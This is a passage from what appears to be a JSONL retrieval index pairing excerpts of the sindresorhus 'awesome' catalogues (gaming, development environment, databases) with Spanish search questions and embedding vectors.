-0.03179, -0.0207, 0.01025, -0.00867, 0.06335, -0.16282, -0.07706, 0.16604, -0.03825, -0.01704, 0.09104, -0.06923, 0.11692, -0.03774, 0.04978, 0.03207, 0.12287, -0.06506, -0.10327, 0.05535, -0.09943, 0.05727, 0.04146, -0.06181, -0.15283, 0.01665, 0.02805, 0.06297, -0.03838, 0.01218, -0.02623, 0.04999, -0.02592, -0.00811, 0.04358, -0.00076, -0.00856, 0.09775, 0.00314, -0.01228, 0.04967, -0.00083, -0.08885, 0.08222, -0.06696, -0.03978, 0.04108, -0.05585, -0.05868, 0.05796, -0.02514, -0.05326, 0.06756, -0.01766, -0.06339, -0.02868, 0.07002, 0.09829, -0.01405, -0.01247, -0.00856, 0.06961, 0.14025, -0.06241, -0.0015, -0.01122, 0.02604, -0.04913, 0.034, 0.00074, -0.03628, -0.00563, 0.01782, -0.03468, -0.1107, 0.02368, -0.06644, 0.02411, 0.04975, -0.07923, 0.03729, -0.04242, 0.05193, 0.10017, 0.04743, 0.06001, -0.00654, 0.00811, 0.08603, -0.04601, -0.02131, -0.0239, -0.05086, 0.01307, -0.07537, -0.03482, -0.05094, -0.00648, -0.0316, 0.02593, -0.03796, -0.04821, -0.01426, -0.02285, 0.01486, -0.00838, -0.0663, 0.00457, -0.0293, -0.05942, 0.05304, 0.01045, 0.01756, -0.05342, 0.00702, -0.03245, 0.00721, 0.06352, 0.00101, -0.02135, 0.01043, 0.07932, 0.01145, -0.04291, 0.02783, 0.03553, 0.04353, 0.01303, 0.02504, 0.04992, 0.06918, -0.07446, 0.00594, 0.08666, -0.00749, 0.00259, 0.00338, 0.00345, 0.02987, -0.01725, -0.04367, 0.0199, 0.02241, 0.04662, -0.005, -0.02066, 0.00544, -0.04034, 0.00758, 0.01117, 0.00033, -0.00354, 0.02366, 0.0443, -0.08202, -0.02749, -0.02853, 0.004, -0.02684, -0.06702, -0.05986, -0.05129, 0.01768, -0.07716, -0.00833, -0.05585, -0.06352, -0.03413, 0.0464, -0.00898, -0.03732, 0.06589]} +{"tipo": "pregunta", "herramienta": "Gaming", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Gaming", "tema": "gaming", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Gaming: Game Production β€” Leading the process of designing, developing, testing and distributing a video game from concept to release. Babylon.js β€” Game engine for cross-platform web and native game development. Roblox β€” Immersive platform for hosting millions of diverse experiences.", "indexar": "que programa hay para desarrollar juegos completos desde cero", "v": [-0.01554, 0.00577, -0.08727, -0.02972, 0.05204, -0.0539, -0.01115, -0.03213, -0.06947, -0.13776, -0.04431, -0.02109, -0.1167, -0.1142, 0.09436, -0.05602, 0.06876, -0.09934, 0.00107, 0.055, -0.05761, -0.01297, 0.0283, -0.22779, -0.03238, 0.0714, 0.01873, -0.06957, -0.0338, -0.01008, 0.05355, -0.07527, 0.14168, -0.10579, 0.08403, -0.09215, 0.09384, -0.06547, -0.04878, -0.02572, 0.01104, -0.00356, -0.01419, -0.02961, 0.08108, -0.01026, 0.14949, -0.00391, 0.02056, -0.15525, 0.04408, 0.02852, -0.02822, -0.15021, 0.07241, -0.14552, -0.02424, -0.07494, -0.04145, -0.04985, -0.0226, 0.15361, 0.09741, -0.09522, 0.01837, -0.02608, 0.05767, 0.03869, -0.07993, 0.12709, -0.08269, 0.08044, 0.01761, 0.04304, -0.0121, 0.02531, -0.05088, -0.05371, -0.03853, -0.05098, 0.0085, -0.10576, -0.04874, 0.10642, -0.05336, 0.03495, 0.05682, 0.00782, -0.06318, 0.00658, 0.02783, 0.05348, -0.10605, -0.01751, -0.02814, -0.09942, 0.19467, 0.0788, 0.04287, 0.10116, -0.04952, -0.0188, -0.05986, 0.09309, -0.0516, 0.10236, 0.04778, 0.00364, -0.06977, 0.03701, -0.03325, 0.02008, 0.00156, 0.01314, -0.07225, 0.04584, -0.01322, -0.04999, 0.09836, -0.05855, -0.22161, 0.11594, -0.00426, 0.04031, 0.00291, -0.02666, -0.08295, 0.10761, 0.01826, 0.05846, 0.02609, 0.03549, -0.09805, -0.01206, -0.10175, -0.00055, 0.04805, 0.07842, -0.03182, 0.02306, 0.01948, 0.09803, 0.06722, 0.04508, 0.02043, 0.02903, 0.00899, -0.07, -0.00385, 0.02497, 0.03165, 0.08344, -0.03619, 0.06753, -0.09868, 0.04473, 0.068, 0.0298, -0.02161, -0.00715, -0.03182, 0.04378, -0.02905, -0.05361, 0.08021, -0.03779, 0.04266, 0.02074, 0.031, 0.05508, -0.06923, 0.02994, 0.04342, -0.07688, -0.04046, 0.04167, -0.0178, -0.01499, -0.0266, -0.08962, -0.06893, 0.03211, -0.01272, 0.05187, -0.05384, -0.05849, -0.02328, -0.02133, 0.08325, -0.0133, -0.05915, 0.01909, -0.04806, 0.04735, -0.00879, 0.02178, 0.03564, -0.02142, 0.01396, 0.01214, -0.06038, 0.01411, 0.02453, 0.00348, 0.00621, 0.10761, 0.00217, -0.03283, -0.00554, 0.06689, 0.01221, -0.06265, 0.01431, 0.06136, -0.02078, -0.08316, 0.02469, 0.04763, 0.10329, 0.01971, -0.02399, -0.0264, 0.01611, -0.00167, 0.01397, -0.06492, 0.03677, 0.09655, 0.05319, 0.01964, 0.02565, 0.00074, -0.03244, -0.0036, 0.0086, 0.04468, 0.02403, -0.05635, -0.05902, -0.05157, -0.01189, 0.04382, 0.00903, -0.06986, -0.02554, -0.08247, -0.03721, -0.01977, -0.00306, -0.03696, -0.04002, 0.00562, -0.00119, -0.08793, 0.0124, 0.01854]} +{"tipo": "pregunta", "herramienta": "Gaming", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Gaming", "tema": "gaming", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Gaming: Game Production β€” Leading the process of designing, developing, testing and distributing a video game from concept to release. Babylon.js β€” Game engine for cross-platform web and native game development. Roblox β€” Immersive platform for hosting millions of diverse experiences.", "indexar": "con quΓ© puedo crear experiencias interactivas en la web sin instalar nada", "v": [0.06677, 0.22861, -0.21484, -0.04651, 0.08954, -0.10257, -0.08755, 0.01348, -0.09652, -0.10292, -0.09753, -0.08151, -0.07888, -0.08882, 0.03501, 0.09409, 0.10457, -0.0673, 0.08773, -0.03229, -0.05269, -0.01037, -0.14577, -0.04805, -0.00672, -0.05213, -0.0355, -0.05024, 0.0107, -0.0046, -0.02032, 0.04755, 0.04828, 0.05061, -0.07901, -0.04568, 0.05602, -0.01543, 0.09387, -0.01143, 0.00062, 0.09695, -0.0179, 0.15777, 0.05126, -0.02505, 0.00876, -0.13059, -0.00031, 0.00839, -0.01092, 0.03644, -0.09795, -0.08278, 0.0237, -0.10062, 0.14945, -0.22701, 0.07262, -0.001, -0.07695, 0.15251, -0.04069, 0.07529, 0.06333, -0.04423, -0.01309, -0.00915, -0.07353, 0.14487, 0.0105, -0.03355, 0.04372, -0.07392, 0.1017, 0.0964, -0.01938, -0.06346, 0.00825, 0.00674, 0.0658, -0.00097, 0.06784, -0.04735, 0.01565, -0.03202, -0.04848, -0.09078, 0.03345, -0.11951, 0.06692, 0.03398, 0.02386, -0.05425, -0.03912, -0.13124, 0.1545, 0.0071, 0.05777, -0.0291, -0.1038, -0.00337, -0.03798, 0.12189, 0.00768, -0.03283, 0.05126, 0.02336, 0.00522, -0.09957, 0.07284, 0.01662, -0.01964, -0.05333, -0.00809, 0.06751, -0.03356, -0.02887, -0.02629, 0.01698, -0.06766, -0.00654, -0.00706, 0.03171, -0.02546, 0.06729, -0.02442, 0.02405, -0.00703, 0.09607, -0.00578, -0.13688, 0.02918, -0.06921, 0.02637, -0.02986, -0.02046, -0.0088, -0.03425, -0.05028, 0.04067, 0.0444, -0.06061, -0.05703, -0.06901, 0.04383, -0.02069, 0.01271, -0.02762, 0.05027, -0.04, -0.00808, 0.00773, 0.05581, -0.08493, -0.00395, 0.07132, -0.02557, -0.00287, 0.00432, -0.04457, 0.02996, 0.00111, 0.03909, -0.02126, -0.01212, -0.1936, -0.03887, 0.06029, 0.04233, -0.058, 0.10304, 0.04583, -0.08811, 0.06895, 0.02488, -0.03524, -0.04647, 0.02973, -0.08936, -0.001, 0.00043, -0.0195, 0.00244, -0.0583, -0.10089, -0.05133, -0.01877, -0.05458, 0.03638, -0.00443, 0.02355, -0.06185, 0.02095, 0.11892, -0.01951, 0.05995, -0.03747, -0.05079, 0.00807, -0.03994, -0.00265, -0.01934, -0.01837, 0.04684, 0.0237, -0.05127, 0.074, 0.01493, 0.03513, 0.05683, -0.00769, 0.04029, -0.06856, 0.0123, -0.01337, 0.03555, -0.00195, -0.02579, 0.03343, 0.03037, 0.02859, -0.0102, -0.02093, 0.02438, 0.00621, 0.00752, 0.0332, 0.02448, 0.03794, -0.02168, -0.03736, 0.00114, 0.02964, 0.02978, -0.00527, 0.03437, 0.0216, -0.03708, 0.00845, 0.00194, 0.08203, 0.0197, 0.00215, 0.02482, -0.08333, -0.03207, 0.03615, -0.06797, -0.06769, -0.05973, 0.00845, 0.06824, -0.01134, -0.03215, 0.0124]} +{"tipo": "pregunta", "herramienta": "Gaming", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Gaming", "tema": "gaming", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Gaming: Game Production β€” Leading the process of designing, developing, testing and distributing a video game from concept to release. Babylon.js β€” Game engine for cross-platform web and native game development. Roblox β€” Immersive platform for hosting millions of diverse experiences.", "indexar": "cual es una alternativa a los motores de juegos tradicionales para desarrollo web", "v": [0.11819, -0.01638, -0.02917, -0.08188, -0.08933, 0.10781, 0.00576, 0.02231, -0.03782, -0.08398, -0.11996, -0.04386, -0.02001, -0.00146, 0.04333, -0.06115, 0.14008, -0.09405, 0.06543, -0.08595, -0.075, -0.07367, -0.10823, -0.11578, 0.03062, 0.03058, -0.01919, 0.01421, -0.15683, 0.06618, 0.00953, 0.08805, 0.16217, -0.04354, -0.14242, -0.09382, 0.0565, 0.0507, -0.00377, -0.09121, -0.03049, -0.11517, -0.08723, -0.09203, -0.02607, 0.00134, -0.00776, -0.0753, -0.04275, -0.08004, -0.00266, 0.09334, 0.02548, -0.03267, 0.13684, -0.05812, 0.08796, -0.13315, -0.09943, -0.05898, -0.07972, 0.08286, 0.01719, -0.04173, 0.00264, -0.04095, -0.07455, -0.01385, -0.09999, 0.03578, 0.02299, 0.11375, 0.05575, -0.03412, -0.00054, 0.06259, 0.00611, 0.06302, -0.06496, 0.0474, 0.08264, -0.08959, -0.05851, 0.13073, -0.0199, 0.0049, 0.01836, -0.17003, -0.02983, -0.04938, 0.02204, 0.06086, -0.03857, 0.08199, -0.08416, -0.12641, 0.05167, 0.05179, 0.02637, 0.05372, -0.00348, -0.04037, -0.04721, 0.03532, 0.03158, -0.01643, 0.16866, 0.02482, -0.02892, -0.02568, -0.00193, 0.06338, -0.03754, 0.0814, 0.00623, 0.03143, -0.0648, -0.01399, 0.03326, -0.05298, -0.15485, 0.05611, -0.00964, 0.01667, -0.08586, 0.0117, -0.02802, 0.07164, -0.02791, -0.00395, 0.05405, -0.08484, -0.00979, -0.03142, -0.11704, 0.05292, 0.12354, 0.0601, 0.08469, 0.02051, 0.12925, 0.03164, 0.00684, -0.05562, 0.06449, 0.01449, 0.02029, -0.03135, -0.05054, -0.05879, -0.08402, -0.01692, -0.00326, 0.06784, -0.11126, 0.04951, -0.09152, -0.00856, -0.02775, 0.08046, -0.01197, 0.00045, 0.00321, -0.02306, -0.01643, 0.05034, -0.04453, 0.00723, 0.00147, -0.05704, -0.00758, 0.02701, -0.00941, -0.07283, 0.11449, 0.06018, -0.0923, -0.02753, 0.0387, -0.04037, -0.06582, 0.03823, -0.10305, 0.05818, -0.06857, -0.0461, 0.0049, -0.05958, -0.01332, 0.0119, -0.03403, -0.00814, -0.1266, -0.01173, 0.02477, 0.03323, -0.01418, -0.05567, -0.01943, -0.06317, -0.0471, -0.00147, -0.04251, -0.10824, -0.0534, 0.06887, -0.0029, -0.06853, -0.06657, 0.03749, 0.04764, 0.01847, 0.05528, 0.02166, -0.00989, -0.05539, 0.00231, -0.01514, 0.01566, -0.03642, -0.00427, -0.07469, 0.02616, 0.00373, 0.01013, 0.02116, 0.0569, 0.06983, 0.01962, -0.02559, 0.01187, 0.0177, -0.03448, 0.03423, 0.00475, 0.09735, -0.01534, -0.04114, -0.08567, 0.01396, 0.05715, -0.01269, -0.01534, 0.00711, -0.01596, -0.05522, -0.09063, -0.08067, -0.00339, -0.012, -0.08072, 0.00526, -0.00332, -0.00909, 0.04813, 0.02899]} +{"tipo": "pregunta", "herramienta": "Development Environment", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Development Environment", "tema": "development environment", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Development Environment: Quick Look Plugins β€” For macOS. Dev Env. Dotfiles. Shell. Fish β€” User-friendly shell. Command-Line Apps. ZSH Plugins. GitHub β€” Hosting service for Git repositories. Browser Extensions. Cheat Sheet. Pinned Gists β€” Dynamic pinned gists for your GitHub profile. Git Cheat Sheet & Git Flow. Git Tips. Git Add-ons β€” Enhance the CLI [git]. Git Hooks β€” Scripts for automating tasks during workflows [git]. SSH. FOSS for Developers. Hyper β€” Cross-platform terminal app built on web technologies. Terminals Are Sexy. GitHub Actions β€” Create tasks to automate your workflow and share them with others on GitHub. WezTerm β€” Powerful cross-platform terminal emulator.", "indexar": "que programa hay para crear gists dinΓ‘micos en mi perfil de GitHub?", "v": [0.07082, 0.03715, -0.07041, -0.10385, 0.21953, -0.14473, -0.17875, 0.02918, -0.1088, -0.03762, 0.14187, 0.02656, -0.15612, -0.00867, 0.00918, -0.04999, 0.03586, -0.14419, -0.08471, 0.08583, -0.06233, 0.16454, 0.10467, -0.07325, -0.00738, -0.11847, 0.10225, -0.09283, -0.03411, 0.0752, 0.12502, -0.07816, -0.17411, -0.17145, -0.07759, -0.11049, 0.05633, -0.02375, 0.05617, 0.0111, -0.01046, -0.02359, 0.03119, 0.08226, 0.04204, -0.12126, 0.04221, -0.08471, -0.08601, -0.00813, 0.03865, 0.0703, 0.03262, 0.01646, 0.02431, -0.0305, -0.04309, -0.18888, -0.09403, -0.02698, -0.00627, 0.0365, 0.04505, 0.04407, 0.00014, -0.04793, 0.08945, 0.0481, -0.15339, 0.04145, -0.0869, 0.04245, -0.02528, -0.00044, 0.13052, 0.05404, 0.00376, -0.02925, 0.0001, -0.01091, -0.01727, 0.02311, 0.02616, 0.12648, -0.1389, -0.04418, -0.01354, -0.05222, 0.02271, 0.04125, 0.04663, -0.01064, -0.06647, 0.11541, -0.07189, -0.10633, 0.11157, 0.02325, 0.01361, -0.06204, -0.01397, -0.06322, -0.05447, 0.13161, -0.03595, 0.08744, 0.10281, -0.03872, -0.06169, 0.09022, 0.0612, 0.0065, 0.01813, 0.03301, 0.06523, -0.00091, -0.05184, -0.01766, 0.04397, -0.03156, -0.03848, 0.01674, -0.07042, -0.00463, 0.00283, 0.06602, -0.03752, 0.00616, -0.00739, 0.08674, -0.01586, 0.01288, -0.05423, -0.01349, -0.06144, 0.00516, 0.01951, -0.014, -0.03282, -0.09026, -0.04301, 0.12933, 0.05268, 0.00277, 0.06047, 0.04351, 0.01242, -0.06002, -0.0155, 0.08673, -0.01052, 0.02119, 0.00084, -0.0167, -0.06467, -0.03067, -0.01853, -0.04419, -0.10237, 0.01895, 0.00946, 0.05357, -0.09403, 0.03493, 0.11376, -0.02842, 0.01877, 0.01378, 0.07118, 0.04991, -0.06201, 0.08967, 0.07264, -0.03917, 0.036, 0.06153, 0.02154, -0.09086, -0.01721, -0.00058, -0.05746, -0.01797, 0.03549, -0.01343, -0.05008, -0.05414, 0.05615, 0.04977, -0.01589, 0.04128, -0.04737, 0.02919, 0.01321, -0.01226, 0.02495, 0.01019, -0.02427, -0.02931, 0.04494, -0.03346, -0.0032, -0.02103, -0.00485, 0.02243, -0.00989, 0.05034, -0.03989, -0.02967, 0.03517, 0.0412, 0.03054, -0.06571, -0.00951, -0.01971, 0.04123, -0.00848, 0.01255, -0.00483, 0.04492, -0.00553, -0.00791, -0.01112, 0.02178, 1e-05, -0.0143, -0.04759, -0.00403, -0.00413, -0.01367, 0.006, 0.0162, -0.03238, 0.00581, -0.03459, 9e-05, 0.03347, 0.02192, -0.02203, 0.00092, -0.03276, -0.02778, 0.01199, -0.01628, 0.01339, -0.03202, 0.04907, -0.01295, 0.06214, -0.03601, -0.04459, -0.07315, 0.00731, 0.02983, -0.07514, 0.0315, -0.00322]} +{"tipo": "pregunta", "herramienta": "Development Environment", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Development Environment", "tema": "development environment", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Development Environment: Quick Look Plugins β€” For macOS. Dev Env. Dotfiles. Shell. Fish β€” User-friendly shell. Command-Line Apps. ZSH Plugins. GitHub β€” Hosting service for Git repositories. Browser Extensions. Cheat Sheet. Pinned Gists β€” Dynamic pinned gists for your GitHub profile. Git Cheat Sheet & Git Flow. Git Tips. Git Add-ons β€” Enhance the CLI [git]. Git Hooks β€” Scripts for automating tasks during workflows [git]. SSH. FOSS for Developers. Hyper β€” Cross-platform terminal app built on web technologies. Terminals Are Sexy. GitHub Actions β€” Create tasks to automate your workflow and share them with others on GitHub. WezTerm β€” Powerful cross-platform terminal emulator.", "indexar": "con quΓ© puedo automatizar tareas de Git dentro de mi flujo de trabajo?", "v": [-0.02634, 0.13686, -0.18511, -0.02376, 0.03221, 0.01082, -0.03813, 0.08541, -0.12679, 0.07252, -0.09672, 0.014, -0.00304, 0.1254, 0.14422, 0.04812, 0.1155, -0.11142, -0.08752, 0.08962, -0.10233, -0.04331, 0.04694, -0.10549, -0.12352, 0.01404, 0.0721, 0.00569, -0.1476, 0.08439, 0.06569, 0.03323, 0.08608, -0.17311, 0.04577, 0.03043, -0.03033, 0.14729, -0.03213, 0.003, -0.03748, 0.06185, -0.16972, 0.0157, 0.06713, -0.08277, 0.10761, -0.18015, -0.01853, 0.02671, -0.04623, -0.06117, 0.08147, -0.07276, -0.11857, -0.01957, 0.09775, -0.05675, -0.02018, -0.01332, 0.0271, 0.1253, -0.0558, 0.05886, -0.07463, -0.0016, 0.12773, 0.04979, 0.02539, 0.16459, -0.04024, 0.01733, -0.08448, -0.04237, 0.0104, 0.04535, -0.09006, 0.04568, 0.012, 0.05851, 0.00307, 0.09712, -0.02899, 0.03185, -0.02422, -0.10002, -0.02908, -0.04917, 0.02036, -0.04141, -0.10666, -0.0327, 0.00594, 0.04899, 0.00881, 0.06858, 0.00858, 0.0101, -0.06311, -0.0069, 0.04442, -0.03369, -0.08597, 0.09759, -0.01403, 0.08464, 0.0181, 0.04109, -0.03011, -0.11364, -0.0511, 0.05086, -0.01567, -0.02671, -0.0173, 0.04808, -0.06276, -0.0021, -0.00464, -0.04589, -0.03991, 0.03979, 0.04675, 0.0183, 0.05468, -0.10804, 0.11114, 0.08198, 0.0112, -0.0523, 0.00012, 0.10062, -0.09627, -0.00262, 0.0386, 0.05002, 0.08427, -0.06858, -0.03842, -0.10618, 0.01317, 0.02313, 0.07896, 0.029, 0.0728, 0.06281, 0.06611, -0.09023, -0.02476, -0.08702, -0.02697, -0.05929, 0.06761, -0.01787, 0.00911, 0.0484, 0.03084, 0.0658, 0.0309, -0.01406, 0.06422, 0.02329, -0.05379, 0.06516, -0.03854, 0.00189, -0.0324, -0.0263, 0.02174, 0.00675, -0.04516, -0.00845, 0.03953, -0.08067, -0.00722, -0.00407, 0.02368, -0.00935, 0.04089, 0.04245, -0.02805, 0.08429, -0.02478, -0.02502, 0.05346, -0.02643, 0.04322, -0.08385, -0.01464, 0.10149, -0.01977, -0.02549, 0.03624, -0.05551, 0.03264, -0.0131, -0.01621, -0.03497, -0.03844, -0.0353, 0.02525, -0.06696, -0.04165, 0.02112, -0.03847, 0.05615, 0.00243, 0.03628, 0.00013, 0.0111, 0.09986, -0.04797, 0.02956, -0.05673, 0.02107, 0.02544, -0.02453, -0.07778, 0.02278, -0.03256, 0.0519, -0.01129, 0.05955, -0.08236, -0.03839, 0.01742, 0.05547, 0.02416, 0.02205, 0.00828, -0.01069, 0.06752, -0.0322, -0.07442, -0.00321, 0.03919, -0.02021, 0.02084, -0.00177, -0.04327, 0.04587, 0.03945, 0.01493, -0.06394, -0.04939, 0.03168, -0.08063, 0.02794, -0.08258, -0.04444, -0.09033, 0.02073, -0.02262, -0.01869, 0.05023, -0.0204]} +{"tipo": "pregunta", "herramienta": "Development Environment", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Development Environment", "tema": "development environment", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Development Environment: Quick Look Plugins β€” For macOS. Dev Env. Dotfiles. Shell. Fish β€” User-friendly shell. Command-Line Apps. ZSH Plugins. GitHub β€” Hosting service for Git repositories. Browser Extensions. Cheat Sheet. Pinned Gists β€” Dynamic pinned gists for your GitHub profile. Git Cheat Sheet & Git Flow. Git Tips. Git Add-ons β€” Enhance the CLI [git]. Git Hooks β€” Scripts for automating tasks during workflows [git]. SSH. FOSS for Developers. Hyper β€” Cross-platform terminal app built on web technologies. Terminals Are Sexy. GitHub Actions β€” Create tasks to automate your workflow and share them with others on GitHub. WezTerm β€” Powerful cross-platform terminal emulator.", "indexar": "existe alguna alternativa libre a Hyper como terminal para mi Mac?", "v": [-0.12661, 0.06909, -0.08083, -0.08348, -0.17602, 0.0049, -0.19897, 0.04707, -0.17258, 0.06241, -0.07662, -0.09476, 0.1304, 0.08737, 0.14763, 0.0373, -0.03522, -0.09497, 0.202, -0.07094, 0.01691, 0.11265, -0.12366, -0.07049, 0.02957, -0.04441, -0.07478, -0.01538, -0.17311, -0.19335, 0.09572, 0.01479, -0.00411, -0.01887, -0.09727, -0.01593, 0.0667, -0.04594, 0.10224, 0.00607, 0.04882, -0.0394, 0.00177, 0.06716, 0.08144, -0.04299, -0.02034, 0.01676, -0.05125, 0.02954, 0.00837, -0.05946, -0.11195, 0.12766, 0.06455, -0.00024, 0.01334, -0.03896, 0.01021, -0.0181, -0.09436, 0.0418, 0.04723, -0.03285, 0.05514, 0.08422, -0.05927, -0.03683, -0.07628, 0.18828, -0.0378, -0.00684, 0.04639, 0.0036, -0.04327, 0.00747, 0.02774, -0.07167, 0.14195, 0.07747, 0.01596, 0.06654, -0.01128, 0.0236, 0.00176, -0.03557, 0.01252, -0.05781, 0.08802, 0.15514, 0.05697, 0.02321, -0.01918, 0.09255, -0.02108, -0.11088, -0.1027, 0.03157, -0.06205, -0.00327, 0.0804, 0.14576, -0.07313, 0.00965, 0.01563, -0.03541, 0.03607, -0.06361, -0.02119, 0.03006, 0.07487, -0.02157, 0.08626, -0.04432, -0.086, -0.0999, 0.02652, 0.05058, -0.03528, -0.01232, 0.00171, -0.01761, 0.02093, -0.03991, 0.01018, 0.00873, 0.00919, 0.0241, -0.00126, 0.07809, 0.0495, -0.06653, 0.01926, -0.09394, -0.09304, -0.08769, 0.08238, -0.03593, -0.04352, 0.03049, -0.03111, 0.01944, -0.05468, -0.01998, -0.04562, -0.00565, -0.04347, 0.04645, 0.01988, -0.11857, -0.03987, -0.03577, -0.05723, 0.01371, -0.01987, 0.07853, 0.02931, 0.00402, -0.05024, 0.12357, -0.04981, -0.07659, -0.08857, 0.03146, -0.0509, 0.03616, -0.04551, -0.05236, -0.09106, 0.05776, 0.00729, 0.06467, 0.07166, -0.05647, 0.04968, -0.038, 0.01756, -0.06426, 0.04374, -0.0194, 0.05887, -0.00075, -0.0339, -0.02187, 0.01208, -0.07552, 0.0427, 0.02699, 0.00731, 0.03255, 0.00864, -0.00022, -0.02213, -0.03528, 0.00061, 0.05572, 0.07048, -0.0978, -0.04143, -0.01711, -0.04889, 0.01601, 0.02991, 0.01574, 0.03343, 0.02106, -0.05571, -0.00891, 0.02465, 0.05471, 0.00488, 0.04407, 0.05123, 0.03981, 0.03127, 0.01652, 0.0067, 0.02723, 0.02374, 0.01238, 0.01173, -0.01288, -0.01119, 0.0744, -0.01041, 0.05865, 0.00762, 0.03714, -0.00641, 0.00171, 0.05548, 0.00319, 0.0072, 0.01835, -0.03, -0.02297, 0.0154, -0.00294, 0.02258, 0.0018, 0.04529, 0.02923, 0.02963, -0.02016, -0.04731, 0.02413, -0.06638, -0.04171, -0.0628, 0.00915, -0.02714, 0.00963, 0.01158, 0.00954, 0.01992, 0.05114]} +{"tipo": "pregunta", "herramienta": "Databases", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Databases", "tema": "databases", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Databases: Database. MySQL. SQLAlchemy. InfluxDB. Neo4j. MongoDB β€” NoSQL database. RethinkDB. TinkerPop β€” Graph computing framework. PostgreSQL β€” Object-relational database. CouchDB β€” Document-oriented NoSQL database. HBase β€” Distributed, scalable, big data store. NoSQL Guides β€” Help on using non-relational, distributed, open-source, and horizontally scalable databases. Database Tools β€” Everything that makes working with databases easier. TypeDB β€” Logical database to organize large and complex networks of data as one body of knowledge. Cassandra β€” Open-source, distributed, wide column store, NoSQL database management system. Supabase β€” An open-source alternative to Firebase. PocketBase β€” An open-source, Go-based backend in one file. Neon β€” An open-source alternative to AWS Aurora.", "indexar": "que base de datos es mejor para redes complejas?", "v": [-0.00281, 0.03467, -0.04891, -0.08096, 0.03569, -0.02943, -0.05367, -0.00242, -0.03338, -0.0546, -0.02614, -0.14698, -0.1517, -0.127, 0.05948, -0.0555, -0.08122, -0.01821, 0.08913, -0.15765, -0.00542, -0.1148, -0.0899, -0.0477, -0.13822, -0.0525, 0.0687, 0.05447, -0.15487, 0.09102, -0.08428, -0.08509, -0.08221, 0.04873, -0.02435, 0.09978, -0.03677, 0.13592, -0.04981, -0.0988, 0.01735, -0.03348, -0.09474, 0.06804, 0.09732, 0.08031, -0.13792, -0.01906, 0.00233, -0.0795, -0.1038, 0.00153, -0.09913, -0.03572, -0.10652, -0.09188, 0.05747, -0.06474, 0.0063, 0.06301, 0.00268, -0.04741, -0.03655, 0.04558, -0.00217, -0.04647, 0.06463, 0.00017, 0.01348, 0.0921, 0.10278, 0.10555, -0.03836, -0.07931, 0.04866, 0.05752, 0.1338, 0.00183, -0.02787, 0.10493, -0.0318, -0.03171, -0.12914, 0.0753, -0.05305, 0.05157, 0.0617, -0.02495, -0.00286, -0.03556, 0.07284, 0.00894, -0.06362, 0.03332, 0.07993, 0.03053, -0.02828, -0.09611, 0.0506, -0.01895, -0.07945, 0.056, 0.0436, 0.03267, -0.02181, 0.06161, 0.05387, 0.00326, -0.04307, -0.1037, -0.04419, -0.01812, -0.02431, 0.00265, -0.02374, -0.04479, -0.06794, 0.03859, 0.00199, 0.02864, 0.05366, -0.03317, 0.02258, -0.0825, 0.01551, 0.04259, -0.08584, 0.10152, 0.08227, 0.06968, -0.07537, 0.02382, -0.06648, -0.00761, 0.07418, 0.05484, -0.02551, -0.12394, -0.02863, -0.10589, -0.07429, 0.01892, -0.13117, -0.04857, 0.06871, 0.04381, 0.06623, 0.00146, -0.08569, 0.05923, 0.02869, 0.07021, 0.05654, 0.00351, -0.07449, 0.11536, -0.06534, -0.08959, -0.00713, 0.02487, 0.02643, 0.01891, -0.05065, -0.01226, -0.0007, -0.04066, -0.04551, 0.06409, 0.05972, 0.02208, -0.09654, 0.11588, -0.03059, -0.10414, 0.01977, 0.01127, -0.03022, -0.04874, -0.06438, 0.03005, -0.01549, -0.08727, 0.03999, -0.01109, 0.04295, -0.0437, 0.05171, -0.02352, -0.03254, -0.04249, -0.01372, 0.05457, 0.03943, 0.05376, 0.10473, -0.10975, -0.0317, -0.01136, 0.05692, 0.00563, -0.02611, 0.04717, -0.01818, 0.00687, -0.05874, 0.01039, -0.01926, -0.11891, 0.06127, -0.02714, -0.01124, -0.0323, -0.00397, -0.06343, -0.02496, -0.04931, 0.05479, -0.00077, 0.01156, -0.01737, -0.05274, 0.08288, 0.03343, 0.00048, -0.0518, 0.03582, -0.02423, -0.03742, 0.01358, -0.07405, 0.03261, -0.06862, 0.00314, -0.04067, -0.00872, -0.01358, -0.08184, -0.01216, -0.01163, -0.02853, -0.00072, 0.01881, -0.04035, -0.00821, -0.00306, -0.01392, -0.12104, 0.05852, -0.00988, -0.12023, -0.02794, -0.08025, 0.07198, 0.02412, 0.00706, -0.01787]} +{"tipo": "pregunta", "herramienta": "Databases", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Databases", "tema": "databases", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Databases: Database. MySQL. SQLAlchemy. InfluxDB. Neo4j. MongoDB β€” NoSQL database. RethinkDB. TinkerPop β€” Graph computing framework. PostgreSQL β€” Object-relational database. CouchDB β€” Document-oriented NoSQL database. HBase β€” Distributed, scalable, big data store. NoSQL Guides β€” Help on using non-relational, distributed, open-source, and horizontally scalable databases. Database Tools β€” Everything that makes working with databases easier. TypeDB β€” Logical database to organize large and complex networks of data as one body of knowledge. Cassandra β€” Open-source, distributed, wide column store, NoSQL database management system. Supabase β€” An open-source alternative to Firebase. PocketBase β€” An open-source, Go-based backend in one file. Neon β€” An open-source alternative to AWS Aurora.", "indexar": "cuΓ‘l es una alternativa libre a Firebase?", "v": [-0.07972, 0.05225, 0.07604, 0.05876, -0.12593, 0.02894, -0.06922, -0.08602, -0.15979, -0.10117, -0.03793, 